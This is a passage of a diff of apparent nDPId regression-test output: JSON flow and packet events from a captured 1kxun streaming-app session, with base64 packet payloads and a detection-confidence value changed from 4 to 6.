RyRCgHEsCezWqHEEnBe6lt45LN7+nKTtUGBiORRwCb3AjBAgAgQRA4uzfngi1AbWtlgDNks5GggC8g7BhCJACGl5XOa\/3ijKFBkQJcf33JkyX581McBFQ+ZkZC9jazbHNkQQcBkCEwAu0IKr9RGnO2mvdedP33kl8gtJaI2F2ECM9h70GPfvrGTxBShr\/nUN0ea+z9uaJkR+CRPv1nvr3Kyv82KN58vWAMYOp3TV1lVzxDAnVoHr4CXZZuIWtnm39kGxCeivA7bql4OAGj5EL1YaGlrP3J\/St3H649PBfa6qm8A9W8sypUAh7Mrjjd7e0MEGAvM6jmPzjfDqbXcgmGF7S11ntZLOZZwyZ\/E8cvrWRY3wLVJwapklKVtiAkKo6KsqqxEQoAn1oKhCiIhhfVGWtWE5ofPrFVEQG4qM6lZM0Va2NNGErK8\/Sy0gpSYlSDEyBkmUKexJxN7Ku\/5i8EIRegKFiFDTz39N6tv31r1Fsqx5clGqzsujrNSqBkqWnGjhoxBQWUppAyvgZIviPMGYj9tAAX7NnlEPq5Uq5uyf7vPpq\/sXlHYNgSW\/MjEVM\/PXj1pdxwP\/KIFc8dTq12SwiAjUEdFUBhqYAqExZRBqVtn8vXe03q\/pzraHMRr0s6NuKxTfk9xsYB8KrFJ50yRQaEIyYI1B6mBgYVoJ0ZIC7BmYMkBKFiLjnAx\/TNZaetn5tzwZ+Pi+U1GM9O0u8ZLA7v+JSlffDhYmoVBBiifVDC6PGHSbDUZSBUsRef+kiEybQhlYMkg1PEoMU4H8I50fxCAzNFWsPE\/GEe3BhDb5LXHk3j44Iokfkef927\/q8F\/DgCIXuq2\/murMQAAAABJRU5ErkJggg=="} 00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1467,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":140,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1654385134408,"flow_last_seen":1654385134408,"flow_idle_time":7580000,"flow_min_l4_payload_len":499,"flow_max_l4_payload_len":499,"flow_tot_l4_payload_len":499,"flow_avg_l4_payload_len":499,"midstream":1,"thread_ts_msec":1654385134408,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"172.104.119.80","src_port":49242,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
01148{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1467,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":140,"flow_packet_id":1,"flow_last_seen":1654385134408,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":565,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":565,"pkt_l4_len":531,"thread_ts_msec":1654385134408,"pkt":"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\/LK+Ot1oVqSkYVr0nsggzUXVqLY3xMhn21kUxOn\/Wih+42353Fbud1FHovbXK9OXcbMQK3dBv6xTib2pObnOd\/iOY8p\/k5RXpv0Ed2sdq7GC4Dj4sb1\/DbXfBiJ01bRmF0SkZ\/AWi7z48ILIaH80MkD3M1aczLpDs\/2bdIedPUrCo1rdoUbJIqCgUVpBLvVBTF68CRliSDTCuSKpjNBIMLiK\/vDHBXOKc0f\/WGNpz34\/gBCIhwTg=="} -00820{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1467,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":140,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1654385134408,"flow_last_seen":1654385134408,"flow_idle_time":7580000,"flow_min_l4_payload_len":499,"flow_max_l4_payload_len":499,"flow_tot_l4_payload_len":499,"flow_avg_l4_payload_len":499,"midstream":1,"thread_ts_msec":1654385134408,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"172.104.119.80","src_port":49242,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.1kxun","breed":"Fun","category":"Streaming"},"http": {"hostname":"android.yingshi.tcclick.1kxun.com","url":"android.yingshi.tcclick.1kxun.com\/api\/upload.php","code":0,"content_type":"","user_agent":"okhttp\/3.10.0"}} 
+00820{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1467,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":140,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1654385134408,"flow_last_seen":1654385134408,"flow_idle_time":7580000,"flow_min_l4_payload_len":499,"flow_max_l4_payload_len":499,"flow_tot_l4_payload_len":499,"flow_avg_l4_payload_len":499,"midstream":1,"thread_ts_msec":1654385134408,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"172.104.119.80","src_port":49242,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.1kxun","breed":"Fun","category":"Streaming"},"http": {"hostname":"android.yingshi.tcclick.1kxun.com","url":"android.yingshi.tcclick.1kxun.com\/api\/upload.php","code":0,"content_type":"","user_agent":"okhttp\/3.10.0"}} 00770{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1468,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":140,"flow_packet_id":2,"flow_last_seen":1654385135021,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":291,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":291,"pkt_l4_len":257,"thread_ts_msec":1654385135021,"pkt":"nLbQ0+MztKXvZygQCABFAAEVhPRAADUG2Q+saHdQwKgCfgBQwFqEcdTYxxPwR4AYAfrU9wAAAQEICmIHlwGTrRyZSFRUUC8xLjEgNTAwIEludGVybmFsIFNlcnZlciBFcnJvcg0KU2VydmVyOiBvcGVucmVzdHkvMS4xMS4yLjUNCkRhdGU6IFNhdCwgMDQgSnVuIDIwMjIgMjM6MjU6MzQgR01UDQpDb250ZW50LVR5cGU6IHRleHQvaHRtbDsgY2hhcnNldD1VVEYtOA0KVHJhbnNmZXItRW5jb2Rpbmc6IGNodW5rZWQNCkNvbm5lY3Rpb246IGtlZXAtYWxpdmUNClgtUG93ZXJlZC1CeTogUEhQLzcuMS45DQoNCjANCg0K"} 
00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1475,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":141,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1654385136206,"flow_last_seen":1654385136206,"flow_idle_time":7580000,"flow_min_l4_payload_len":212,"flow_max_l4_payload_len":212,"flow_tot_l4_payload_len":212,"flow_avg_l4_payload_len":212,"midstream":1,"thread_ts_msec":1654385136206,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"172.105.121.82","src_port":46184,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00754{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1475,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":141,"flow_packet_id":1,"flow_last_seen":1654385136206,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":278,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":278,"pkt_l4_len":244,"thread_ts_msec":1654385136206,"pkt":"tKXvZygQnLbQ0+MzCABFAAEIhQ1AAEAGzADAqAJ+rGl5UrRoAFD5HfAjxRS50IAYAfbp3AAAAQEICvK1GtLJoc6VR0VUIC92aWRlb19rYW5rYW4vaW1hZ2VzL3JlbGVhc2VzLzI5OS80NzA0LTUwMTdiY2RjYWNjMDJjYzNhZjQ4MzNjZDFlZDcyYThmLmpwZyBIVFRQLzEuMQ0KQ2FjaGUtQ29udHJvbDogbm8tY2FjaGUNCkhvc3Q6IHBpYy4xa3h1bi5jb20NCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkFjY2VwdC1FbmNvZGluZzogZ3ppcA0KVXNlci1BZ2VudDogb2todHRwLzMuMTAuMA0KDQo="} -00843{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1475,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":141,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1654385136206,"flow_last_seen":1654385136206,"flow_idle_time":7580000,"flow_min_l4_payload_len":212,"flow_max_l4_payload_len":212,"flow_tot_l4_payload_len":212,"flow_avg_l4_payload_len":212,"midstream":1,"thread_ts_msec":1654385136206,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"172.105.121.82","src_port":46184,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": 
{"4":"DPI"},"proto":"HTTP.1kxun","breed":"Fun","category":"Streaming"},"http": {"hostname":"pic.1kxun.com","url":"pic.1kxun.com\/video_kankan\/images\/releases\/299\/4704-5017bcdcacc02cc3af4833cd1ed72a8f.jpg","code":0,"content_type":"","user_agent":"okhttp\/3.10.0"}} +00843{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1475,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":141,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1654385136206,"flow_last_seen":1654385136206,"flow_idle_time":7580000,"flow_min_l4_payload_len":212,"flow_max_l4_payload_len":212,"flow_tot_l4_payload_len":212,"flow_avg_l4_payload_len":212,"midstream":1,"thread_ts_msec":1654385136206,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"172.105.121.82","src_port":46184,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.1kxun","breed":"Fun","category":"Streaming"},"http": {"hostname":"pic.1kxun.com","url":"pic.1kxun.com\/video_kankan\/images\/releases\/299\/4704-5017bcdcacc02cc3af4833cd1ed72a8f.jpg","code":0,"content_type":"","user_agent":"okhttp\/3.10.0"}} 00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1476,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":142,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1654385136207,"flow_last_seen":1654385136207,"flow_idle_time":7580000,"flow_min_l4_payload_len":212,"flow_max_l4_payload_len":212,"flow_tot_l4_payload_len":212,"flow_avg_l4_payload_len":212,"midstream":1,"thread_ts_msec":1654385136207,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"172.105.121.82","src_port":46170,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00754{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1476,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":142,"flow_packet_id":1,"flow_last_seen":1654385136207,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":278,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":278,"pkt_l4_len":244,"thread_ts_msec":1654385136207,"pkt":"tKXvZygQnLbQ0+MzCABFAAEIuBVAAEAGmPjAqAJ+rGl5UrRaAFA4F3kV79XZwoAYAfbp3AAAAQEICvK1GtPJoc6VR0VUIC92aWRlb19rYW5rYW4vaW1hZ2VzL3JlbGVhc2VzLzI5Ni80NzAxLWUxNGQwNDgxYzhmYmU4YTQyNzk1YWJiODc5Y2RhMmQyLmpwZyBIVFRQLzEuMQ0KQ2FjaGUtQ29udHJvbDogbm8tY2FjaGUNCkhvc3Q6IHBpYy4xa3h1bi5jb20NCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkFjY2VwdC1FbmNvZGluZzogZ3ppcA0KVXNlci1BZ2VudDogb2todHRwLzMuMTAuMA0KDQo="} -00843{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1476,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":142,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1654385136207,"flow_last_seen":1654385136207,"flow_idle_time":7580000,"flow_min_l4_payload_len":212,"flow_max_l4_payload_len":212,"flow_tot_l4_payload_len":212,"flow_avg_l4_payload_len":212,"midstream":1,"thread_ts_msec":1654385136207,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"172.105.121.82","src_port":46170,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.1kxun","breed":"Fun","category":"Streaming"},"http": {"hostname":"pic.1kxun.com","url":"pic.1kxun.com\/video_kankan\/images\/releases\/296\/4701-e14d0481c8fbe8a42795abb879cda2d2.jpg","code":0,"content_type":"","user_agent":"okhttp\/3.10.0"}} 
+00843{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1476,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":142,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1654385136207,"flow_last_seen":1654385136207,"flow_idle_time":7580000,"flow_min_l4_payload_len":212,"flow_max_l4_payload_len":212,"flow_tot_l4_payload_len":212,"flow_avg_l4_payload_len":212,"midstream":1,"thread_ts_msec":1654385136207,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"172.105.121.82","src_port":46170,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.1kxun","breed":"Fun","category":"Streaming"},"http": {"hostname":"pic.1kxun.com","url":"pic.1kxun.com\/video_kankan\/images\/releases\/296\/4701-e14d0481c8fbe8a42795abb879cda2d2.jpg","code":0,"content_type":"","user_agent":"okhttp\/3.10.0"}} 00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1477,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":143,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1654385136215,"flow_last_seen":1654385136215,"flow_idle_time":7580000,"flow_min_l4_payload_len":212,"flow_max_l4_payload_len":212,"flow_tot_l4_payload_len":212,"flow_avg_l4_payload_len":212,"midstream":1,"thread_ts_msec":1654385136215,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"172.105.121.82","src_port":46200,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00755{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1477,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":143,"flow_packet_id":1,"flow_last_seen":1654385136215,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":278,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":278,"pkt_l4_len":244,"thread_ts_msec":1654385136215,"pkt":"tKXvZygQnLbQ0+MzCABFAAEI535AAEAGaY\/AqAJ+rGl5UrR4AFBRsl56JroizIAYAfbp3AAAAQEICvK1GtvJoc6eR0VUIC92aWRlb19rYW5rYW4vaW1hZ2VzL3JlbGVhc2VzLzMwMS81MDI3LWQ3MDcxOTJiZmEyZGFiZjIyNzcxYTRkNTY0NTRhYjg4LmpwZyBIVFRQLzEuMQ0KQ2FjaGUtQ29udHJvbDogbm8tY2FjaGUNCkhvc3Q6IHBpYy4xa3h1bi5jb20NCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkFjY2VwdC1FbmNvZGluZzogZ3ppcA0KVXNlci1BZ2VudDogb2todHRwLzMuMTAuMA0KDQo="} -00843{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1477,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":143,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1654385136215,"flow_last_seen":1654385136215,"flow_idle_time":7580000,"flow_min_l4_payload_len":212,"flow_max_l4_payload_len":212,"flow_tot_l4_payload_len":212,"flow_avg_l4_payload_len":212,"midstream":1,"thread_ts_msec":1654385136215,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"172.105.121.82","src_port":46200,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.1kxun","breed":"Fun","category":"Streaming"},"http": {"hostname":"pic.1kxun.com","url":"pic.1kxun.com\/video_kankan\/images\/releases\/301\/5027-d707192bfa2dabf22771a4d56454ab88.jpg","code":0,"content_type":"","user_agent":"okhttp\/3.10.0"}} 
+00843{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1477,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":143,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1654385136215,"flow_last_seen":1654385136215,"flow_idle_time":7580000,"flow_min_l4_payload_len":212,"flow_max_l4_payload_len":212,"flow_tot_l4_payload_len":212,"flow_avg_l4_payload_len":212,"midstream":1,"thread_ts_msec":1654385136215,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"172.105.121.82","src_port":46200,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.1kxun","breed":"Fun","category":"Streaming"},"http": {"hostname":"pic.1kxun.com","url":"pic.1kxun.com\/video_kankan\/images\/releases\/301\/5027-d707192bfa2dabf22771a4d56454ab88.jpg","code":0,"content_type":"","user_agent":"okhttp\/3.10.0"}} 00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1478,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":144,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1654385136216,"flow_last_seen":1654385136216,"flow_idle_time":7580000,"flow_min_l4_payload_len":212,"flow_max_l4_payload_len":212,"flow_tot_l4_payload_len":212,"flow_avg_l4_payload_len":212,"midstream":1,"thread_ts_msec":1654385136216,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"172.105.121.82","src_port":46212,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00755{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1478,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":144,"flow_packet_id":1,"flow_last_seen":1654385136216,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":278,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":278,"pkt_l4_len":244,"thread_ts_msec":1654385136216,"pkt":"tKXvZygQnLbQ0+MzCABFAAEIGp5AAEAGNnDAqAJ+rGl5UrSEAFDq37\/yn5TBcIAYAfbp3AAAAQEICvK1GtzJoc6cR0VUIC92aWRlb19rYW5rYW4vaW1hZ2VzL3JlbGVhc2VzLzMwMC81MTgzLTUxZmI5OWEyMzkxZTc3NDAzN2JhMjFjYmNhMzA3YmU0LmpwZyBIVFRQLzEuMQ0KQ2FjaGUtQ29udHJvbDogbm8tY2FjaGUNCkhvc3Q6IHBpYy4xa3h1bi5jb20NCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkFjY2VwdC1FbmNvZGluZzogZ3ppcA0KVXNlci1BZ2VudDogb2todHRwLzMuMTAuMA0KDQo="} -00843{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1478,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":144,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1654385136216,"flow_last_seen":1654385136216,"flow_idle_time":7580000,"flow_min_l4_payload_len":212,"flow_max_l4_payload_len":212,"flow_tot_l4_payload_len":212,"flow_avg_l4_payload_len":212,"midstream":1,"thread_ts_msec":1654385136216,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"172.105.121.82","src_port":46212,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.1kxun","breed":"Fun","category":"Streaming"},"http": {"hostname":"pic.1kxun.com","url":"pic.1kxun.com\/video_kankan\/images\/releases\/300\/5183-51fb99a2391e774037ba21cbca307be4.jpg","code":0,"content_type":"","user_agent":"okhttp\/3.10.0"}} 
+00843{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1478,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":144,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1654385136216,"flow_last_seen":1654385136216,"flow_idle_time":7580000,"flow_min_l4_payload_len":212,"flow_max_l4_payload_len":212,"flow_tot_l4_payload_len":212,"flow_avg_l4_payload_len":212,"midstream":1,"thread_ts_msec":1654385136216,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"172.105.121.82","src_port":46212,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.1kxun","breed":"Fun","category":"Streaming"},"http": {"hostname":"pic.1kxun.com","url":"pic.1kxun.com\/video_kankan\/images\/releases\/300\/5183-51fb99a2391e774037ba21cbca307be4.jpg","code":0,"content_type":"","user_agent":"okhttp\/3.10.0"}} 01140{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1479,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":140,"flow_packet_id":3,"flow_last_seen":1654385136274,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":564,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":564,"pkt_l4_len":530,"thread_ts_msec":1654385136274,"pkt":"tKXvZygQnLbQ0+MzCABFAAImA99AAEAGThTAqAJ+rGh3UMBaAFDHE\/BHhHHVuYAYAfXo9wAAAQEICpOtI+NiB5cBUE9TVCAvYXBpL3VwbG9hZC5waHAgSFRUUC8xLjENCkNhY2hlLUNvbnRyb2w6IG5vLWNhY2hlDQpDb250ZW50LVR5cGU6IGFwcGxpY2F0aW9uL29jdGV0LXN0cmVhbQ0KQ29udGVudC1MZW5ndGg6IDI2NA0KSG9zdDogYW5kcm9pZC55aW5nc2hpLnRjY2xpY2suMWt4dW4uY29tDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpBY2NlcHQtRW5jb2Rpbmc6IGd6aXANClVzZXItQWdlbnQ6IG9raHR0cC8zLjEwLjANCg0KeJxNkNFuhCAQRX+lmWdjFESRt+0vNH1qGoMwu0tUMIiuycZ\/L7ht0oQH5lzmzmWeEMyES5DTDKKsWUU5KynL3kDjZhSCeMKqjQYBmlBkBHnb9Lq6Ut5qXaimokTxuoxdkIG6S2txjI\/LYV9tJJPTZ73oobvNd2ex23kdhd5Lm1xvzt1GjMAt3YZ+Mc6m9uQm5\/kfIjnPSX5Okd4b9JFdrPYuhsvA4+LGNfx2F7zYy6atojA6JaO\/ALTd50cEFsPD+SGSh7maNOZl0p2f7FskvGlqyipNWJuCTVJFoSCiZOKdiKJ4HTjSkmSQaUVSBbOZYHAB8fWdAe4K55Tmr97QhvN+HD8N\/HBS"} 
00898{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1480,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":141,"flow_packet_id":2,"flow_last_seen":1654385136559,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":386,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":386,"pkt_l4_len":352,"thread_ts_msec":1654385136559,"pkt":"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"} 02504{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1481,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":141,"flow_packet_id":3,"flow_last_seen":1654385136559,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":1506,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1506,"pkt_l4_len":1472,"thread_ts_msec":1654385136559,"pkt":"nLbQ0+MztKXvZygQCABFAAXUdodAADcG3rqsaXlSwKgCfgBQtGjFFLsQ+R3w94AQAOuqegAAAQEICsmhz1XytRrS\/9j\/4AAQSkZJRgABAQAAAQABAAD\/4QAwRXhpZgAATU0AKgAAAAgAAQExAAIAAAAOAAAAGgAAAAB3d3cubWVpdHUuY29tAP\/bAEMABAIDAwMCBAMDAwQEBAQFCQYFBQUFCwgIBgkNCw0NDQsMDA4QFBEODxMPDAwSGBITFRYXFxcOERkbGRYaFBYXFv\/bAEMBBAQEBQUFCgYGChYPDA8WFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFv\/AABEIAQQCgAMBEQACEQEDEQH\/xAAfAAABBQEBAQEBAQAAAAAAAAAAAQIDBAUGBwgJCgv\/xAC1EAACAQMDAgQDBQUEBAAAAX0BAgMABBEFEiExQQYTUWEHInEUMoGRoQgjQrHBFVLR8CQzYnKCCQoWFxgZGiUmJygpKjQ1Njc4OTpDREVGR0hJSlNUVVZXWFlaY2RlZmdoaWpzdHV2d3h5eoOEhYaHiImKkpOUlZaXmJmaoqOkpaanqKmqsrO0tba3uLm6wsPExcbHyMnK0tPU1dbX2Nna4eLj5OXm5+jp6vHy8\/T19vf4+fr\/xAAfAQADAQEBAQEBAQEBAAAAAAAAAQIDBAUGBwgJCgv\/xAC1EQACAQIEBAMEBwUEBAABAncAAQIDEQQFITEGEkFRB2FxEyIygQgUQpGhscEJIzNS8BVictEKFiQ04SXxFxgZGiYnKCkqNTY3ODk6Q0RFRkdISUpTVFVWV1hZWmNkZWZnaGlqc3R1dnd4eXqCg4SFhoeIiYqSk5SVlpeYmZqio6Slpqeoqaqys7S1tre4ubrCw8TFxsfIycrS09TV1tfY2dri4+Tl5ufo6ery8\/T19vf4+fr\/2gAMAwEAAhEDEQA\/APk7XL28GtXY+2XHE7\/8tD\/eNc59AkrIq\/br3\/n8uP8Av4aB2Qfbr3\/n8uP+\/hoCyD7de\/8AP5cf9\/DQFkH269\/5\/Lj\/AL+GgLIBfXvP+mT\/APfw0BZB9uvf+fy4\/wC\/hoCyD7de\/wDP5cf9\/DQFkH269\/5\/L
j\/v4aAsg+3Xv\/P5cf8Afw0BZB9uvf8An8uP+\/hoCyD7de\/8\/lx\/38NAWQfbr3\/n8uP+\/hoCyD7de\/8AP5cf9\/DQFkH269\/5\/Lj\/AL+GgLIPt17\/AM\/lx\/38NAWQfbr3\/n8uP+\/hoCyEa+viOLyf\/v4aAshft17\/AM\/lx\/38NAWQfbr3\/n8uP+\/hoCyD7de\/8\/lx\/wB\/DQFkH269\/wCfy4\/7+GgLIPt17\/z+XH\/fw0BZB9uvf+fyf\/v4aAsg+3Xv\/P5P\/wB\/DQFkH269\/wCfy4\/7+GgLIPt17\/z+XH\/fw0BZB9uvf+fyf\/v4aAsg+3Xv\/P5P\/wB\/DQFkH269\/wCfy4\/7+GgLIPt17\/z+XH\/fw0BZB9uvf+fy4\/7+GgLIPt17\/wA\/lx\/38NAWQfbr3\/n8uP8Av4aAsgN9e5x9sn\/7+GgLIPt17\/z+T\/8Afw0BZB9uvf8An8uP+\/hoCyD7de\/8\/lx\/38NAWQfbr3\/n8uP+\/hoCyD7de\/8AP5cf9\/DQFkH269\/5\/J\/+\/hoK5A+3Xv8Az+T\/APfw0XDlFF5en\/l8n\/7+GlzAoXHJdXxPF5Of+2hpc5pGm9ixFLfMB\/pdwP8AtqahyR0wpX6FqA3\/APz9z++JDWTmdEMNd7F2EX2Aftc\/p\/rDUOpY6IYdLoW4Ptn\/AD8zHPGfMNQ6l2ddPDxavYsKbsOCLifA6fvDzUc7Nlho9iwj3Q+U3M3Xp5hpObsUqC7DxLdg\/wDHzPwefnNS5GkaK7E6S3hAH2if\/v4aXMX7NdhwkvMAfapsZ5\/eGjmLVFdiRJ7kEAXMpAGfvn86LmnsY9hPtN5ux9plHtvPSjmE6UV0Q1bm727hcS493PFHML2cexE15dZyLmbp"} 
@@ -763,115 +763,114 @@ 02427{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1492,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":143,"flow_packet_id":3,"flow_last_seen":1654385136563,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":1506,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1506,"pkt_l4_len":1472,"thread_ts_msec":1654385136563,"pkt":"nLbQ0+MztKXvZygQCABFAAXU7ZhAADYGaKmsaXlSwKgCfgBQtHgmuiQMUbJfToAQAOskjAAAAQEICsmhz1rytRrb\/9j\/4AAQSkZJRgABAQEAeAB4AAD\/4QAwRXhpZgAATU0AKgAAAAgAAQExAAIAAAAOAAAAGgAAAAB3d3cubWVpdHUuY29tAP\/bAEMABAIDAwMCBAMDAwQEBAQFCQYFBQUFCwgIBgkNCw0NDQsMDA4QFBEODxMPDAwSGBITFRYXFxcOERkbGRYaFBYXFv\/bAEMBBAQEBQUFCgYGChYPDA8WFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFv\/AABEIASICJgMBEQACEQEDEQH\/xAAfAAABBQEBAQEBAQAAAAAAAAAAAQIDBAUGBwgJCgv\/xAC1EAACAQMDAgQDBQUEBAAAAX0BAgMABBEFEiExQQYTUWEHInEUMoGRoQgjQrHBFVLR8CQzYnKCCQoWFxgZGiUmJygpKjQ1Njc4OTpDREVGR0hJSlNUVVZXWFlaY2RlZmdoaWpzdHV2d3h5eoOEhYaHiImKkpOUlZaXmJmaoqOkpaanqKmqsrO0tba3uLm6wsPExcbHyMnK0tPU1dbX2Nna4eLj5OXm5+jp6vHy8\/T19vf4+fr\/xAAfAQADAQEBAQEBAQEBAAAAAAAAAQIDBAUGBwgJCgv\/xAC1EQACAQIEBAMEBwUEBAABAncAAQIDEQQFITEGEkFRB2FxEyIygQgUQpGhscEJIzNS8BVictEKFiQ04SXxFxgZGiYnKCkqNTY3ODk6Q0RFRkdISUpTVFVWV1hZWmNkZWZnaGlqc3R1dnd4eXqCg4SFhoeIiYqSk5SVlpeYmZqio6Slpqeoqaqys7S1tre4ubrCw8TFxsfIycrS09TV1tfY2dri4+Tl5ufo6ery8\/T19vf4+fr\/2gAMAwEAAhEDEQA\/APvKRyGwMdB1UelMQm9v9n\/vkU7CuSBjjt+QoAXcfb8hQAbj7fkKAFDHHb8qADcfb8qADcfb8qADcfb8qAFBOO35U